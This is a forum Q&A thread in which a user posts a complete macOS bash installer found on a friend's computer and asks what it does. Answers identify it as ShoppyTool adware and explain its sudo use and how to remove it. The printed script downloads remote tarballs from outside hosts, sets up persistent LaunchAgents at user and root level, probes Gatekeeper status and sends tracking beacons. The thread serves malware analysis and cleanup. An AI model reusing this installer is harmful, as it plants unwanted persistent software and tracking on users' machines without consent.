# What does this malicious bash script do?

Tags: malware, virus, macos, bash

I found this script digging around on a friend's computer (Mac OSX El Capitan) today. It obviously looks malicious, and seems to be an install/setup script. I can see it moves files around and unpacks some tar balls.

My question: how do I best reverse/mitigate the effects of this code? I'm having a hard time actually finding what it does.

Also: How does it get SU access?

```
#!/bin/bash
waitFor() {
    # Wait for 5 mins
    while ((SECONDS < 600)); do
        kill -0 $1 >/dev/null 2>&1
        if [ $? = 1 ]; then
            # Process finished, return proccess exit code
            wait $1
            return $?
        fi
        sleep 1
    done

    echo Installation timed out.
    return 22
}

tracking() {
    trackingUrl="http://service.srvmacinfo.com/tracking/cm_mac.php?clickid=54572400474442142&${1}"
    curl -s -L -o /dev/null "$trackingUrl"
    #echo Tracking $trackingUrl
}

reportExecuteStatus() {
    returnCode=$?
    if [ "$returnCode" = "0" ]; then
        tracking currins=$insname
        return $returnCode
    else
        tracking errors=$insname:returnCode:$returnCode
    fi
}

mmtmp="/private/tmp/.mminstallerscripts_`date +%Y%m%d%H%M%S`"
mkdir -p $mmtmp

if [ -z "$SUDO_USER" ]; then
    INSTALLER_USER="$USER"
else
    INSTALLER_USER="$SUDO_USER"
fi

tracking funnel=installOffersStart
sleep 1



{



# --------------------------------------------------------------------------------

tracking funnel=installing_webtools 

insname="webtools"
echo ---------- $insname ----------

# existing check
brands=(flashmall webshoppers webshoppy smartshoppy shoptool shoppytool coolshopper easyshopper liveshoppers smart-shoppy easy-shopper bestwebshoppers hotshoppy bestsmartshoppers)
brandExists=false
for currBrand in "${brands[@]}"; do
    if [ `pgrep -i $currBrand | wc -l` -gt 0 ]; then
        brandExists=$currBrand
    fi
done


brand="ShoppyTool"
source="tgo-1624"
timestamp=$(date +%s)

brand_lower_case=$(echo "${brand}" | tr '[:upper:]' '[:lower:]')
compressed_filename="MM${brand}"

url="http://cdn.get${brand_lower_case}.com/download/Mac/InstallerResources/${compressed_filename}.tar.gz"
tmpfile="${mmtmp}/${insname}.tar.gz"
uuid="54572400474442142"

# set parameters from command line (source and brand)
while (( "$#" )); do
  if [[ $1 == --brand=* ]]; then
    brand=${1#*=}
    shift
    continue
  fi

  if [[ $1 == --source=* ]]; then
    source=${1#*=}
    shift
    continue
  fi
  shift
done



label="com.${brand}.agent"
plist_filename="${label}.plist"

applications_folder="/Applications"
install_folder="${applications_folder}/${brand}"
old_executable="${install_folder}/launch"
new_executable="${install_folder}/${brand}"
plist_user="$HOME/Library/LaunchAgents/${plist_filename}"
plist_root="/Library/LaunchAgents/${plist_filename}"

orig_plist_filename="com.plist"
orig_plist_path="${install_folder}/${orig_plist_filename}"

/bin/rm -rf $install_folder
curl -s -L -o $tmpfile $url
sudo -u $INSTALLER_USER tar -xzf $tmpfile -C $applications_folder

sudo -u $INSTALLER_USER mv "${applications_folder}/${compressed_filename}" $install_folder
sudo -u $INSTALLER_USER mv $old_executable $new_executable

my_name=`who | grep -v mbsetup | head -n1 | awk '{print $1}'`
applications_support="/Users/${my_name}/Library/Application Support"
sudo -u $INSTALLER_USER mkdir -p "${applications_support}/.${brand}"
sudo -u $INSTALLER_USER cp -rf "${install_folder}" "${applications_support}/.${brand}"

sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Set Label $label" $orig_plist_path
sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Add ProgramArguments:0 string $new_executable" $orig_plist_path
sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Add ProgramArguments:1 string -guid" $orig_plist_path
sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Add ProgramArguments:2 string $uuid" $orig_plist_path
sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Add ProgramArguments:3 string -source" $orig_plist_path
sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Add ProgramArguments:4 string $source" $orig_plist_path
sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Add ProgramArguments:5 string -brand" $orig_plist_path
sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Add ProgramArguments:6 string $brand" $orig_plist_path
sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Add ProgramArguments:7 string -dt" $orig_plist_path
sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Add ProgramArguments:8 string $timestamp" $orig_plist_path

if [ "$EUID" -ne 0 ]; then
  # user
  launchctl unload $plist_user >> ${mmtmp}/${insname}.log 2>&1
  /bin/rm -f $plist_user
  cp $orig_plist_path $plist_user
  launchctl load -w $plist_user  >> ${mmtmp}/${insname}.log 2>&1
else
  # root
  launchctl unload $plist_root >> ${mmtmp}/${insname}.log 2>&1
  sudo -u $INSTALLER_USER launchctl unload $plist_user >> ${mmtmp}/${insname}.log 2>&1
  /bin/rm -f $plist_root
  cp $orig_plist_path $plist_root
  sudo -u root launchctl load -w $plist_root >> ${mmtmp}/${insname}.log 2>&1
    # user
  sudo -u $INSTALLER_USER /bin/rm -f $plist_user
  sudo -u $INSTALLER_USER cp $orig_plist_path $plist_user
  sudo -u $INSTALLER_USER launchctl load -w $plist_user  >> ${mmtmp}/${insname}.log 2>&1
fi

/bin/rm $orig_plist_path
/bin/rm $tmpfile

if [ "$brandExists" = false ]; then
    tracking currins=$insname
else
    tracking c5=$brandExists
fi



# --------------------------------------------------------------------------------

tracking funnel=installing_macupdater 

insname=macupdater
echo ---------- $insname ----------

brand="Software-Updater"
brand_lower_case=$(echo "${brand}" | tr '[:upper:]' '[:lower:]')
compressed_filename="MM${brand}"
domain="macsoftwareupdater"



#compressed_filename="MMUpdater"
url="http://cdn.${domain}.com/download/Mac/InstallerResources/${compressed_filename}.tar.gz"
tmpfile="${mmtmp}/${insname}.tar.gz"
uuid="54572400474442142"
default_source="tgo-1624"
default_software_name=$brand

software_name="$default_software_name"
source="$default_source"

label=com."${software_name}.agent"
plist_filename="${label}.plist"

applications_folder="/Applications"
install_folder="/Applications/${software_name}"
old_executable="${install_folder}/macupdater"
new_executable="${install_folder}/${software_name}"
plist_user="$HOME/Library/LaunchAgents/${plist_filename}"
plist_root="/Library/LaunchAgents/${plist_filename}"

orig_plist_filename="com.plist"
orig_plist_path="${install_folder}/${orig_plist_filename}"
uuid_file="${install_folder}/guid.txt"
source_file="${install_folder}/source.txt"

/bin/rm -rf $install_folder
curl -s -L -o $tmpfile $url
sudo -u $INSTALLER_USER tar -xzf $tmpfile -C $applications_folder
sudo -u $INSTALLER_USER mv "${applications_folder}/${compressed_filename}" $install_folder
sudo -u $INSTALLER_USER mv $old_executable $new_executable

sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Set Label $label" $orig_plist_path
sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Add ProgramArguments:0 string $new_executable" $orig_plist_path
sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Add ProgramArguments:1 string -guid" $orig_plist_path
sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Add ProgramArguments:2 string $uuid" $orig_plist_path
sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Add ProgramArguments:3 string -source" $orig_plist_path
sudo -u $INSTALLER_USER /usr/libexec/PlistBuddy -c "Add ProgramArguments:4 string $source" $orig_plist_path


if [ "$EUID" -ne 0 ]; then
    # user
    launchctl unload $plist_user >> ${mmtmp}/${insname}.log 2>&1
    /bin/rm -f $plist_user
    cp $orig_plist_path $plist_user
    launchctl load -w $plist_user  >> ${mmtmp}/${insname}.log 2>&1
else
    # user
    sudo -u $INSTALLER_USER launchctl unload $plist_user >> ${mmtmp}/${insname}.log 2>&1
    sudo -u $INSTALLER_USER /bin/rm -f $plist_user
    sudo -u $INSTALLER_USER cp $orig_plist_path $plist_user
    sudo -u $INSTALLER_USER launchctl load -w $plist_user  >> ${mmtmp}/${insname}.log 2>&1
    # root
    launchctl unload $plist_root >> ${mmtmp}/${insname}.log 2>&1
    /bin/rm -f $plist_root
    cp $orig_plist_path $plist_root
    launchctl load -w $plist_root >> ${mmtmp}/${insname}.log 2>&1
fi

/bin/rm $orig_plist_path
/bin/rm $tmpfile

# currently always report install
tracking currins=$insname


sleep 1

if [ "$EUID" -ne 0 ]; then
    tracking "funnel=installOffersDone(noroot)"
else
    tracking "funnel=installOffersDone"
fi

spctl=`spctl --status -v`;
appstorestr='assessments enabled';
devsignstr='developer id enabled';
setting=0
appstore=false
devsign=false

if [[ $spctl =~ .*${appstorestr}.* ]]
then
    appstore=true
fi

if [[ $spctl =~ .*${devsignstr}.* ]]
then
    devsign=true
fi

if [[ "$appstore" = true && "$devsign" = false ]]
then
    setting=1
else
    if [[ "$appstore" = true && "$devsign" = true ]]
    then
        setting=2
    else
        if [[ "$appstore" = false && "$devsign" = false ]]
        then
            setting=3
        fi
    fi
fi

tracking "c6=${setting}"


/bin/rm -rf "${mmtmp}"



} >> ${mmtmp}/install.log 2>&1
```

Comment: After a Google search of the "brand" keyword: https://www.pcrisk.com/removal-guides/10259-shoppytool-adware-mac

Answer (score 4, accepted):

> I'm having a hard time actually finding what it does.
>
> ```
> ...
> brands=(flashmall webshoppers webshoppy smartshoppy shoptool shoppytool coolshopper easyshopper liveshoppers smart-shoppy easy-shopper bestwebshoppers hotshoppy bestsmartshoppers)
> ```

It installs adware.

> Also: How does it get SU access?

It simply calls `sudo`. My guess is that it was part of a larger "free" software install (like adware often is) and due to the previous installation it already had the necessary permissions so no prompting for password is needed.

> My question: how do I best reverse/mitigate the effects of this code?

Remove the installed software. Just search for the various adware "brands" shown above and you'll find enough instructions on the internet.

Comment: Bit of a separate question, but how do the necessary permissions 'carry over' to the operation of the script? Friend installed MacKeeper (which this may have been bundled with), gave password to allow installation, and then the installer enters SU, then runs this with those permissions?

Comment: @socrates:  As soon as the application gains super-user access, it may use multiple techniques to give its application elevated access, including setting the sticky (setuid) bit on its executable.

Comment: @socrates: my guess is that the installer uses `sudo` and not `su` since by default on Mac there is no root password which would be needed by `su`. Permissions gained by `sudo` are cached for some time, i.e. within the next N minutes (configurable) sudo will not need to ask for a password again.  See the [documentation of sudo](https://www.sudo.ws/man/1.8.15/sudo.man.hml) and look for "credential caching".